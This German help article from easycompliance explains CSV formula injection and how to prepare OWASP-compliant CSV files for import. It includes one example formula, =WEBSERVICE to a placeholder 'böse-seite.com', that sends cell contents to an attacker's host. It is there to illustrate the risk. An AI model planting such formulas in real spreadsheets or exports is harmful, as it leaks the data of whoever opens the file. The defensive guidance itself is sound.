CSV-Dateien können beim Öffnen in externen Programmen, Onlinetools oder auch Excel gefährlich werden, wenn sie Formeln oder eine bestimmte Reihenfolge von Sonderzeichen
enthalten. Hier erklären wir, wie Sie CSV-Dateien OWASP-konform erstellen, damit es beim Import in easycompliance zu keinen Problemen kommt. Denn nicht konforme CSV-Dateien können beim manuellen Upload blockiert werden und Sie erhalten eine Warnmeldung von Cloudflare.
Was ist OWASP?
OWASP (Open Worldwide Application Security Project) ist eine internationale Organisation, die Best Practices für IT-Sicherheit veröffentlicht. Dazu gehört auch der Schutz vor sogenannten CSV- oder Formula-Injections.
Warum können CSV-Dateien gefährlich sein?
Eine CSV-Datei ist eigentlich nur eine Tabelle als Textdatei. Jede Zeile entspricht einer Tabellenzeile, die Spalten werden oft durch Komma oder Semikolon getrennt.
So weit so harmlos.
Das Problem:
Wenn eine Zelle mit bestimmten Zeichen beginnt (z. B. =, +, - oder @), interpretiert Excel den Inhalt als Formel.
Ein Angreifer könnte also statt normaler Daten Formeln einschleusen, die beim Öffnen automatisch ausgeführtwerden.
So könnten Passwörter oder Daten gestohlen werden.
Beispiel:
=WEBSERVICE("http://böse-seite.com?daten="&A1)Diese Zeile könnte beim Öffnen der Datei im Hintergrund Daten versenden.
Was bedeutet “OWASP-konform” bei CSV?
Damit eine CSV-Datei sicher ist, empfiehlt OWASP:
Alle Inhalte escapen (absichern), die mit =, +, - oder @ anfangen.
Das macht man, indem man vorne ein einfaches ' (Apostroph) setzt.
Beispiel:
Unsicher: =SUM(A1:A2)
Sicher: '=SUM(A1:A2)
Alle Spalten sollten mit doppelten Anführungszeichen " eingeschlossen werden:
"Name";"Kundennummer"
Dieses ist insbesondere in der Verarbeitung für Onlinetools (wie easycompliance) sehr wichtig.
Nur saubere Daten exportieren – keine unnötigen Sonderzeichen oder Skripte.
Dateien prüfen, bevor man sie an andere weitergibt.
Wie kann ich meine CSV-Datei für easycompliance aufbereiten?
Zunächst sollten Sie sich die Frage stellen, ob es überhaupt notwendig ist, o.g. Sonderzeichen in den Spalten zu haben. Denn easycompliance benötigt grds. nur Namen und ggf. eine Referenznummer (Kundennummer bspw.). Gänge Zeichen wie u.a. bei "GmbH & Co. KG" sind unproblematisch, aber Formeln oder Skripte sollten grds. in CSV-Dateien, die für den Datenimport in easycompliance vorgesehen sind, nicht enthalten sein!
Es gibt mehrere einfache Möglichkeiten, Daten für den Import vorzubereiten, wenn Ihre Ursprungssysteme nicht bereits konforme CSV-Dateien generieren können:
1. Mit Excel
Öffnen Sie die CSV-Datei in Excel.
Suchen Sie nach Zellen, die mit =, +, - oder @ beginnen.
Setzen Sie davor ein ' oder entfernen Sie bestenfalls die Formeln/Sonderzeichen.
Hinweis: Das ' wird im Excel nicht immer angezeigt, verhindert aber, dass Excel die Formel ausführt.
Tipp: Mit der Suchen-und-Ersetzen-Funktion geht das recht schnell.
2. Mit ChatGPT / KI
Sie können CSV-Daten (oder einen Auszug) bspw. in ChatGPT einfügen und schreiben: “Mache meine CSV OWASP-konform und schließe die Spalten mit doppeltem Anführungszeichen ein. Entferne auch Formeln und Skripte”. ChatGPT setzt dann automatisch die nötigen Schutzzeichen und entfernt unnötige Formeln und Skripte, sodass eine konforme und saubere CSV-Struktur entsteht.
Beispiel:
Ursprüngliche CSV:
Name;Kundennummer
Max Mustermann;=123-45
OWASP-konforme CSV:
"Name";"Kundennummer"
"Max Mustermann";"123-45"
Hinweis: Achten Sie bei der Arbeit mit ChatGPT o.Ä. immer auf Ihre internen Datenschutzrichtlinien und nutzen Sie eine DSGVO-konforme Variante eingesetzter KI-Tools.
3. Mit einem CSV-Tool oder Skript
Für technisch Versierte gibt es auch kleine Skripte (z. B. in Python) oder diverse Onlinetools, die die Datei automatisch bereinigen. Das ist vor allem sinnvoll, wenn Sie viele CSV-Dateien haben.